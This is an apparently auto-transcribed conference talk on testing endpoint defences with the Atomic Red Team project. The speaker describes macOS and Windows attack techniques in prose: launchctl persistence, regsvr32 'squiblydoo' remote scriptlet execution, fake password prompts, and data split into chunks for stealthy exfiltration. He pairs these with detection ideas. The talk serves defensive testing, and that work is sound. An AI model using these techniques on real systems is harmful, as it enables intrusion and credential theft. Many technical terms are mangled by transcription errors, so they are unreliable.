Testing Endpoint Security Solutions with Atomic Red Team

all right hey how's everybody doing today doing good good thumbs up across the board that's good this usually like naptime for a lot of people so glad everybody still awake so thank you guys for coming out today we're going to be talking about testing security solutions with the atomic red team it's an open-source project we started about a year ago you know a little bit less than that I guess but we'll get into that in a little bit so who am I not super-important there's a few my favorite things I have been doing security things for decade-plus really focused on security role for like the last eight ish years doing a lot of different stuff vulnerability management

assessments penetration testing security engineering architecture all that good stuff right now I work for red canary I'm an incident handler with them so we do consulting we do obviously incident handling but they were nice enough to let me steal their slide deck so you'll see the bird in the corner alright so we can talk about today so first of all we're going to talk about testing why it's important and some of the common roadblocks to organizations being able to test effectively and then once I talk about how bad the testing situation is today we'll get into a we'll get into some more fun stuff proposal for how to do it better give you some tools so you

can go home and start doing this immediately so let's look at the current state of the sock obviously this is this is kind of a generalization so your organization might be much better or much worse but this is kind of having worked with a lot of different organizations of different maturities different you know technology stacks this is kind of what we see consistently so so you have things so we have security tools you have your your sim your IDs your IPS you have you know your a/v you have your next-gen a/v you have your next next next gen IV of all this stuff then you have your controls so these are like your pardon systems these

are the things you put in place so that users can't be users and then and then your policies you know so things on paper people are not supposed to do and mostly they do anyway so you have those things and you expect them to do things you expect them to prevent evil and to assemble your is in a response team like Voltron and if apt gets past your you know impenetrable you know fortress you want it to be evicted nuked you you know want their families to suffer so that's that's what you expect from your your stuff but truthfully a lot of organizations have significant investments in their security programs and don't actually know if they work so let's talk about

how we got here how did we how do we build these these big programs that we're not sure about so we build things because it's good security it's best practices you you saw there was a gap you went out and you filled it you made sure that you were taking care of all the different places people could get in if there is a piece of tooling you needed to you know get some additional visibility you went out and try to get it sometimes compliance sometimes you know some governing body says hey you have to have this thing even though you don't think it's particularly effective you have to have it and so therefore you know if you'd like to know that it's

working the way supposed to and expectations so I'm sure a lot of you had a manager or some see the level that it went to RSA and came back and said we have to have browser isolation or next-gen all the things and you're like okay so because Gartner told him to so you're expected to have these things I've talked to organizations and it's like one guy he's the director of everything and he's like yeah you know I'm really thinking that I'm gonna go for a sim next like really because you're doing like operations and Incident Response and security operations you're doing all the things you don't have time for any of that so what are you going to build maintain and

actually get value out of a sim but that's what he's supposed to get that's the next checkbox for him so you know people accumulate things they can't actually use yeah it happens man I totally I've been there so so now now that we have all of these things we have the best prevention the best detection the best visibility the best workflows all of our our teams are like really fine-tuned machines working at maximum efficiency and capacity right right everybody feels that way about the stuff they have so let's let's see how you feel if you think about the organization that you work with work for the security that you have like do a true assessment on

efficacy so you've got a lot of security are you confident that's doing the things that's supposed to do maybe you believe everything is working the way that it's intended to work you hope everything is working the way it's intended to work but as everybody knows hope is a feeling not a strategy you cannot just hope that all of your security is working because you will get breached all right so how do you know it's working you test it right you just have to if you wanted though if something's working if you want to know if a car was going to start up you turn the key right so you test it see if it's gonna work so you have to know that your

stuff works and if you are not testing your controls rest assured someone else is you you may or may not know it yes they're doing it for free and they're gonna give you they're gonna give you a bad day one day so how do we test like we know testing is important and and so how do we go about doing it there's a couple of different ways the testing you know happens today so if you if you're going out and you're looking at some new piece of technology and you ask the vendor like how do I know that you you're doing the thing you're selling me of course they're going to say hey no worries

we'll help you test this so mostly their tests are going to play to their strengths and sometimes they're already rigged if you've ever hear of a vendor who doesn't let you test their their software in an open forum like if only approved vendors can do tests on their product run run from that we I work for a company we we were testing a like an email malware solution and the guy came in the S he came in and he was like yeah this thing's so awesome so awesome say okay cool let's how we're gonna need to test this he's like I guess you give me an email address and we're gonna send you malware that email address and you

can see how good the tool is like okay buddy I'm glad that your tool can catch things one for one in your curated list of malware like that's great but that doesn't necessarily it's gonna catch everything so that's not necessarily a good a good way to do it you could try to do your own build your own test plans but it's kind of hard to get started like how do you how do you know like what are the right things to test how do I take a piece of security tooling or take a control and test it and see like is it is it working the way supposed to is it actually doing the thing and then how do you how do you

scope and track your progress like are you just like if you wanted to test a V are you just going to go download all the malware like where do you stop like how do you know how many samples to test before you know you've tested at all so a common approach that people use for testing is to hire an external Red Team there's problems with this usually it's a compliance checkbox for a lot of organizations so somebody at the top knows that they have to have a piece of paper that says this is a penetration test so that they pass their audits that's usually not a great way to do it because the you know the engagement is

usually all about okay hey just come in do some stuff give me a report and then you're good a lot of times the boots on the ground guys don't even get to talk to you like you know give them some some requirements hey test this test this they just kind of end up with what they get at the end not all teams are created equal John John strand has a term called pin test puppy mills so it's organizations that will come in and they will they will scan your environment with necess they will put it on a very nice word document and that is it that's I'm sure if some of you have probably seen that and if you haven't I

hope you don't but um so there I mean there's some great teams out there some some great guys like you know obviously you know Loras is here you know the mandaeans the specter ops the Black Hills all those there's a lot of really good organizations they're out there but they are hard to get you have to usually schedule them far in advance it's hard to get them to come in on a regular basis and also it's expensive if you you can't probably can't justify the cost of bringing in a top-tier Red Team over and over again like you would need to to get good consistent iterative sometimes they're scoping problems especially in those compliance check box

situations because basically they say come in and hack us you know somebody who's not really in the notes come in here just assess all my things and so you know they just they come in they go for a domain admin they probably get it but they're just gonna take the shortest route to get there they're not necessarily going to test all of your controls and there's long trip times you may have a test year one and then they give you some findings and you go out there and you make sure that's all covered and then maybe you have a recertification test maybe they come back in a couple months and make sure it's actually secure usually you have to

wait till the next year you know if you're one of those organizations fortunate fortunate enough to have quarterly pin test then you know that's that's a little bit quicker but still not fast enough so what's the solution do we build our own red team they can do this all the time that's a great idea I mean so so penetration testing one of the the top top 20 CIS controls but it's number 20 so it's it's it's towards the end of that but it is very very important but the problem with this is do you have the first of all do you have the interest is there somebody in the organization it's like I really want to

do this I'm really like psyched up to do this pin testing is hard it's like to actually like learn all the techniques learn the different tools really put in time like you're talking about work time and at home time it's a it's a commitment it's hard you have someone who's willing to do that and if they are willing to do that do they have any skills already or is this going to be a very long ramp up time is your organization mature enough to even be considering this like I said it's an important control but it is number 20 do you have your admin rights in order do you have patching in order do you have

all those other fundamentals that you should truthfully have in place before you decide to go on build a red team and do you have time does your person who's interested and has some of these skills are they also your firewall you know engineer are they also doing about six or seven other things then they're going to have to put on hold or find other time for so that that's tough also if you wanted to go out and hire somebody these skills are in high demand and they're very expensive so you have to go find somebody probably remote unless you you know happens to live in a wonderful mountainous city like Asheville because people love this place and would come

here but a lot of a lot of other cities like I live in Columbia and nobody wants to be there so so remote is the only option and it's it's difficult to maintain objectivity if you've ever done any red team exercises in your own organization you pretty much know where the holes are you know where the you know how to get your you know get your target pretty quick and and also like if you see the same systems day in and day out how do you really go about okay now I need to go and target this system mountain now maybe this system it's kind of like a game of whack-a-mole you're just you know you already have so much

intimate knowledge you might think a system is like totally tight and there's nothing they can be done to it so you don't even look at it and there might be glaring vulnerabilities or holes or your visibility so so we know it's secure if we know that testing is important and that we know that outside of a few less than desirable options most organizations this really aren't testing at all so how do we fix it we need ongoing iterative testing we need a very fast test build test iteration loop so we need to be able to test something we need to be able to build a detection or a prevention and then we need to be able

to test again to make sure that we've got it covered we need objective measurements we need some some kind of framework or road map that takes us from point A to point B to point Z and and everywhere in between and we need a low barrier for entry we need this to be something that someone who is doing about three other jobs can pick up and do without having to do a lot of you know installation of third-party tools and frameworks and like gear up on those and now all of a sudden like you're spending a ton of time you have a tool it maybe does a handful of tests and you're not sure if

you've spent your time wisely Haas for dramatic effect atomic red team so this is an open source project that we created like said about a year ago it is comprised of discrete unit tests which I'll kind of cover a little bit in a minute and those are mapped to the miter attack framework now some of you who are familiar with Maya attack might be saying miter attack so hot right now miter attack is everywhere everyone's talking about attack it's you know so many frameworks are built around attack there's get webinars they got all kinds of stuff but it's great so if you've never heard of attack so what minor is done is they have they have catalogued a

treasure trove of TTP's tools malware like all these different tracked groups they've kind of put together their techniques their tactics the tools that they use and they've put them in a vendor agnostic form out on the web where everybody can use it which is great because now you don't have to like go by you know you don't have to go by fireEye's Naumann clay Chur or go by you know company X's nomenclature like we can just talk about this as defenders in a common language so it's really cool what's that I know who would have thought the collaboration would be a good thing so so so attack really focuses on the the end of the the kill

chain so the post exploit portion so looking at the persistence mechanisms the way that adversaries escalate privilege and execute software you know malware how they move laterally and and I'm not sure what the mitre approved reasoning for why they did this would attack but in reality if you think about it you could look at everything to the left of this little this bracket and you're like okay well now I need to find I need to be able to like detect and prevent all of these things so detecting exploitation especially in you know the day and age of zero days is pretty hard because there's a lot of different ways to do it there's software being owned

today that's ever been owned before and that's going to continue to be the case and it's going to be tough to stay out in front of that however comma one adversary lands on a system the things that they do I mean they're creatures the habits like the rest of us so they persist in very consistent ways they move laterally in very consistent ways there's there's a less infinite number of things that they can do on the system and it's makes it a little bit easier for us to track it as an example from earlier when the gentleman was talking about you know trick bought and ran some like locking and all that good stuff so

ransomware can be delivered in a large you know large number of ways it's hot kind of hard to plug all those holes however they usually delete your shadow copies the same way every time so if you monitor for that you will have very early knowledge that there's something like that going on and that that's consistent across a lot of those malware families so this is a this is a screenshot of the atomic red team it's changed a little bit we've we've made some some recent adjustments that I will cover kind of towards the end but essentially you know you we have a big pile of markdown files that kind of give you your little copy/paste test that you

can do we've got a lot of other stuff in there as well which we'll cover but this is kind of the the meat of it so for each platform mitre has come up with a matrix covering how they get initial access execution persistence privilege escalation obviously keeps going and there's all of these different techniques for each one of those tactics so each one of those if you if you follow the hyperlink will take you to a test that you can test see do I have anything that will prevent this detect it you know so that I can check it off my box and go along so why do we do this so I mentioned testing is very important

we wanted to lower the barrier for entry this is something that you can do with copy and paste we want a smaller targeted test so if you're if you're from the programming world you know like unit tests is the smallest you know the smallest viable test of a unit of you know something you want to play with so in this case we take a technique and we distill it down into its smallest possible form so that you can take it run it and see if anything happens so that's kind of the that's kind of the idea there and then of course we just really did this because we want to make as big an impact

on as many security organizations as possible I think the most evil because we're all we're all in this together you know this is us versus the enemy so this came out of kind of a bunch of people had kind of similar ideas how do we make this testing thing work for a lot of people Mike had this silly named bookish happiness repo at one point that had kind of the the prototype that eventually became atomic red team so it's it's been around for a while we were working on it pretty heavy last summer and then towards the end of summer we came out and made it public so now we're going to look at how it works

and so this is probably a good time for me to tell you that I am I don't think there's enough emphasis on research and security you know I have Sauron on the Mac and Linux world so a lot of these are going to be Mac and Linux there's a few windows guys there's at least one in there but you know just going to kind of cover a couple of techniques show you what they look like show you how to execute those from atomic Red Team and then show you how you could build a detection capability around that so kind of operationalizing it very quickly so this Apple script if you're not familiar with Apple script it has some

comparatives to to PowerShell it's kind of how programs in the Mac OS ecosystem talk to each other you can use Apple script to tell one application to do something you can have it run shell scripts you can have it do any number of things it can actually talk to another system through SSH it can do a lot of evil things and for the most part it's just allowed to run on all systems so there there are some some mitigation you can put in place and make sure that no unsigned scripts can be run but you know for the most part it's something that needs to be looked at and probably isn't so this is the this is the blurb from

from miter if you go to attack you will see this and this is kind of what it looks like in atomic right team at least at the top so this is kind of a we pull it in from from attack so that you don't have to go and you know do a bunch of research on what the thing is and here's the actual test so in this case what we've done is we've taken the the Empire launcher that uses Apple script and you can only see kind of part of the part of the execution there but do shell script does exactly what you think it does so Apple script says hey hey shell I want you to run this command it passes

to bash and then bash does the thing which is pretty awesome yes so the question was is this done at the users privilege level it is and there's there's ways to escalate that which we'll look at in a minute so you know after seeing one of those you know this is this is a good time to kind of cover the the detection building lifecycle using atomic so you test a thing so you take that you take that little blurb from Apple script you put it into your terminal you run it and then you say okay did I detect this did anything go off did I have you know an EDR alert did I have a similar did I have anything on

my system that said hey there's something bad going on here if you did that's great so now you still have to keep testing there's there's lots of different ways to run each one of these techniques so you can't just check it off your box and never come back to it if you didn't detect it then you have a couple of different things you have to look at do you have the underlying telemetry is there any kind of raw data on any one of your systems that would have given you this if there is that's easy to build a detection capability out of so you can take that and say okay now I'm going to build this sim correlation rule or I'm

going to build XYZ so that next time this happens all the alarms go off and we know that there's something we have to look at and and it's important to kind of mention we want to build resilient detections and I'll kind of cover that when we look at some of the detection building but you'll notice that everything comes back to testing again so everything goes back to testing so that you're always looking at different permutations of the technique so that something gets slipped by you just by aa piece getting the command line a little bit if you did not have any underlying telemetry to build a detection capability it's a great time to say okay

maybe I need sis Mon or maybe I need some other tool that will show me this thing and and given you know whatever technique you used maybe you need something that gives you command line maybe you need something that has better network capability you know maybe maybe there's too many Nats and you're in your network and you need something that's closer to the host to tell you which host actually made that call out so another another different technique so this is T 1152 launched CTL so this is this this is a command-line utility the commands long that works with the launch D in mac OS it's cool mostly it's there for starting daemons up stuff like that

but you can also submit jobs so for instance if you wanted a persistent calculator that every time you closed it it came back you would do that with launch TTL which is which is cool that's maybe maybe not super useful from an adversarial standpoint but like if you always want to make sure that you had a calculator at your hand that's a good that's a good command to use so if we want it to take this little little command from atomic Red Team and build a section capability let's see what we've grabbed so launch TTL if you look in your environment if you have any Mac OS devices you're probably going to see a lot of it because like I said it's

starting up those those Damons it does a lot of things under the hood what it doesn't do a lot is submit new jobs that is um that's that's very rare so it's a good thing to look at to see if somebody is putting something that's that's you know at least somewhat persistent it doesn't survive a reboot which makes it really good for you know trying to accomplish a task while the user is logged in and then completely wiping itself out of existence when they reboot so in this case we could just look for a process name of launched CTL with a command-line argument of submit and that would that would kind of give you give you something to look at there

so this this is an output from Jonathan Levin's tool super audit if you have any Mac devices you might be lamenting the fact that there's not a lot of open source or free utilities to you know kind of get good data from them this is an excellent tool and he actually just added syslog to the to the capability so you can syslog straight out from this utility it's really really cool I put the I put the URL down there so what does this look like if you don't do it with calculator but instead you decide to do something a little bit more nefarious this is the part in the talk where I talk really slowly so you don't

notice how slow I'm typing in the terminal window because it takes longer than I would like it to but I was too lazy to read to recapture it so what we're doing here is so launch CTL I'm submitting the label is evil Python which give you an idea of what it is and then I am just going to point to a Python script and that is not evil dot py and so in this case it's just it's just a little box that pops up that says Python code is executing on your machine most adversaries will not do that that's just something I did for you so I closed it and you notice it came right back and

I'm going to close it again you see the script is actually done down there it's on an empty terminal prompt but it will keep coming back so if somebody is running a hidden Python script that is doing like collecting information on your system it's running some other utilities waiting for a user to go to a certain website it could just sit there and they could actually see the Python running kill it and think they're good and it's gonna come right back so it's an interesting technique so look at so here's for the windows guy so register of 32 this is related to a technique that Cayce released some time ago which he named squiggly-doo which I included

because I like to say squiggly-doo so in this case you know from the atomic read team you know we have a couple of different options for it so we have ways to execute a comm scriptlet locally it register of 32 is also internet or network and proxy aware which is really nice of Microsoft to make it like go right through your proxy and pull a random SEC file from anywhere on the internet and then execute it it's really nice yeah oh yeah it's great oh yeah so yeah it's really good at executing arbitrary code which is not I don't think the intention of the utility but so there's three different tests we have they're only really kind of the top one

is is reference but there's a couple of variables so you can you can you know pass it your filename and that's where you would execute it if you go down that shows you an example with if you want to host something on github and a gist you could do that as well it's very flexible and this is kind of what the command line looks like so if we were going to build a detection capability out of this we would want to build something that would at least cover read serve 30 to the the - you and the - I are the major components for executing that SEC file that that comm scriptlet the you is

unregister and i is the location of the file you want to execute and then scrub jay dll is a script object dynamic library so so at the minimum you would probably want to look for register of 32 in scrub jay dll you could probably grab a couple of those others as well but you don't want to make it too tight like you don't want to take this and then just drop it into an alert because all they would have to do is make a couple of you know a couple of changes you know maybe reorder some of the some of these switches you know so you want to make sure that you are you were

widening your net as wide as possible without killing yourself with false positives all right so now we're back to my friend apple script so gentlemen earlier mentioned you know all this is happening under the users context and it's true if you execute an apple script you know under a shell that's owned by certain user it will execute in their in their context however comma you could get some really cool information especially if they're an admin and in a lot of organizations like people don't want to deal with Mac's so they just make their owners admins which is cool for privileged escalation so here is an input prompt so oh so scripts just tells the system preferences application to to

activate and then put up a box that says hey we need to get your password too by some changes and we all know that users love to give their password to boxes so they're going to type their password in here that's just going to happen and they're gonna hit okay and then it's going to go away just like it's supposed to like it would normally if that was a legitimate system prompt and then what that's going to do is this going to give it to the adversary that executed the Apple script and now they can escalate privilege now they can go they can go to root and now they own the machine so kind of a kind of a cool one

on the the cool thing about this is like like in Windows there's a lot of utilities that can pop up a box and kind of get users to give them their passwords I mean a lot of times they look kind of janky like they don't look legit this Apple script like the way that these boxes are popped up in the way that they're built most legitimate software uses them in the exact same way so this is a very legitimate looking box to a user so if we were going to try to build some kind of detection capability we could take this grab a couple of sections from it maybe look for oh so scripted system proven tsa's maybe just

look for the password I've seen a couple of legitimate tools legitimately built tools that we'll use they will ask for the password in this exact same way which is training the user to get their passwords totally but so so this is this is something you might see in legitimate software as well but if you ever see this spawn from like a bash shell or something like that there's a there's a good chance that there's there's something sketch going on and there's just like a little little process tree from from CV response down there in the bottom just kind of showing you what that looks like on at the host level alright so so this is great so if you

built a detection capability based on this probably going to catch this but you can also execute the exact same thing with a shell so you can you could just pass a couple of arguments call Apple script give it some arguments and the same box that's going to pop up but you're not going to find it with your the detection capability you built in the last slide so the idea don't forget your ABT's always be testing so remember that that loop tests verify build go back test again and then you know keep coming up with different ways to do the same things so we're pretty good for the one for once right so let's let's level up so we have

this concept in atomic red team called chain reactions it's kind of our way of showing you how to change some of these things together in a meaningful way it's like putting Legos together because we give you all the Legos now you have to do is drop them into a script of some sort and now you have a much more robust test you're testing multiple things at the same time this is you know a little bit more advanced so if you feel like you've got things pretty well covered this is a great way say okay an adversary would normally start doing some recon maybe they're going to shove some stuff into a file they're going to

try to exfiltrate it so that's that's kind of what we're trying to simulate here so if you were going to generate a chain reaction start with like a basic script you start picking things off the shelf grab you know a little bit of techniques here a little bit techniques there grab something from every column and then you know execute them see what you find so I'm gonna show you a chain reaction that I built some time ago called Ranger so what we're looking for here is we grab some stuff from defense evasion a lot of stuff from discovery so this is really kind of simulate an adversary in the the Recon face so they're trying to find out what's going

on in the system you know who the users are what privileges they have and then it's going to prep everything for exfiltration so let's look at it so it's really it's just a it's a shell script please when we get into the code please don't laugh at me because I'm not an excellent shell scripting but it works which is really all that matters to me so here's a little bit of the code you can see I just kind of grabbed this is actually it's Mac Linux aware so if you run it you can run it on either one it will figure out what system it's on and we'll do one set of commands versus another so it's just really grabbing

some information from users and groups dumping those all to a text file in a hidden directory as you get towards the bottom but it's going to do is zip all of those those up into an encrypted archive and if you don't have if you don't have command capabilities you're not going to see what the password is so you might not really ever know what came out of there so we throw all those into a zip file and then we bust them up into a bunch of 23 byte pieces and the reason that you would want to do that as an adversary is because now you can very easily exfiltrate without setting off any kind of NetFlow alarms just say hey

every so often to send another one of these these pieces out until they're all gone so it makes it very tough as a defender to see that stuff yeah especially when they're in random or exactly right and this is just kind of what this this looks like when you get to you know the underlying like EDR view so you can see shell spawning like all kinds of things these are also interestingly enough things that admins do all the time recon is really hard to to find because it looks like legitimate activity so that's why you want to you want to have enough detection capability so that you're looking for each one of these techniques and then you see a lot of

them you clustered together on a system it's like I could see somebody running you know a couple of these you know these pseudo commands these whom eyes like when you start putting all of these things together now it's very sketched now now there's there's a good chance that there's somebody that's trying to get information on your system it could be a new employee that's right they then they think that you're some kind of spy all right so so we're beyond chain reactions let's actually put these these tests together with some kind of purpose so we're look at a PT simulation and so mitre is nice enough to track all you know they put all these groups that did

you know fire I and all these other CrowdStrike these organizations have tracked and you know tributed tradecraft too and then they say hey you know a PT 32 they like to use these techniques they like to use these tools and that helps us build a chain reaction that is focused on adversary simulation so first of all evaluate your threat model like know where you work know who your enemies are know the trade craft they use you could go out there and like look at 40 different groups and build a whole bunch if you know scripts that test a bunch of techniques and they might not be representative of the people that actually want to come

into your house so you know know know who your enemies are and then you can just go straight to mitre get you know get some stuff and say okay now I'm going to mimic this actor so we have a chain reaction called the dragon's tail and it's based off of tradecraft from a BT 32 also notice in Lotus out of Vietnam or at least they're supposed to be out of Vietnam attribution is hard so grab a couple of techniques there from the bottom obviously there's they do a lot more you can see there's some cobalt strike stuff in there but we're going to focus on a handful of those at the top so this is this is we called the

dragon's tail you can see a section of the the code there so we're emulating you know apt 32s known for setting up scheduled tasks using the squib Lee do you know technique that we saw earlier with register of 32 so you can see up there at the top the schedule task is being created with that particular script it runs off the page and what it's going to do is it's going to pull down an SCT file and then execute it I believe that one execute calculator the enemy is probably not going to pop calc but at least you'll be able to see what it looks like and then there's you know we like to clean up after ourselves so

we'll delete the scheduled tasks and for the most part these are these are all supposed to be safe but obviously evaluate what you're under your systems don't trust me I might lead you down the wrong path I'm not in this case but I could so a note on simulating a PC so Nick are mentioned at one point I don't know if it's possible to authentically simulate the best apt groups because they have they have all the budget they have all the time they have all the resources so they can come up with you know new you know breaking tradecraft every day but don't let that or you know tweets like this discourage you obviously not real but don't don't let

don't let that discourage you if you can get as close as yesterday to nation state like you're an apex defender like he who are defending at the highest of levels like so - dude don't don't look at it like I'm never gonna catch these guys so why even try like you we have the tradecraft we know what they do so why not put it to your advantage build some rules like figure out because what you'll catch is you'll catch like the guys above the script kiddies the guys that are you know trying to use some of the same tradecraft but not necessarily with the same goals exactly you don't need to outrun the bear just outrun the person

yeah make yourself not an easy target it's a great way to put it somebody else will be a lower hanging piece of fruit than you so so what's next what are we what are we working on next actually probably like what's now so we we so one of the things that we've been working on and have just released some some new goodness and atomic right team is we have yam alized all of our tests so yeah Mel is yet another markdown language and basically what we're trying to do here is make these portable and make them executable from other frameworks so you know Chris gates has meta you know there's a PC simulator there's a bunch

of different utilities they're already set up to consume different techniques and then execute them so we want to make it easy we wanted to to make it really simple just to say hey everyone can just consume from us treat our tests like Metasploit modules like we'll just we'll just put them all out here and you guys execute them on whatever framework you want so that's what we're working on right now I believe everybody everything all of our techniques that are out there now have a Hamel equivalent and then those are the ones that actually spit out the markdown so on the on the right there at Lee homes was nice enough to to build some PowerShell automation which

we're still tweaking a little bit to work with a new gamma format so we're working on a couple of different fronts definitely this next slide is very important definitely feel free to come and join us in and help build some of these things there's a lot of there's a lot of techniques that we we don't necessarily have covered yet but we need better coverage the great thing about this if you've ever wanted to get into open source development or contributing to open source projects it takes about 15 minutes to research one of these techniques find somebody who has done some like this and then you know make your own test so to find somebody else's

research and say okay I'm just going to make a very simple test to test this one thing and then and then submit and we have a we have a slack that we just created not too long ago we've got some really really bright people from the industry in there be biking KC some other folks from our organization we're all hanging out in there so we can help you like start using this atomic red team that IO there's also some there's also some other materials in there so you can get started but yeah please please come it's it's probably one of the the lower drag ways to get involved with open source and obviously if you have any questions you

can email us a researcher at canary those are all of our twitter handles and that's AMA great team comm is actually another site that we have all the all the historical blog and webinars that we've done some blog posts and a lot of like workshops so that you could like get started with this and actually start using some of these techniques so like I've been talking for a long time any questions sorry so the question was you know kind of one of our what are our priorities in the project now so Mac and Linux needs love Mike and Mike in case you're great at coming up with a lot of different ways to do things in in

Windows systems but we definitely need some more we need some more love Windows has love windows has so much love the UNIX the UNIX guys need some love so and those are actually you know some of the easier techniques to employ because a lot of its just coming out of a shell script so it's kind of lends itself to to easier testing so good question thank you anyone else thank you guys

[Music] [Applause] [Music] you [Music]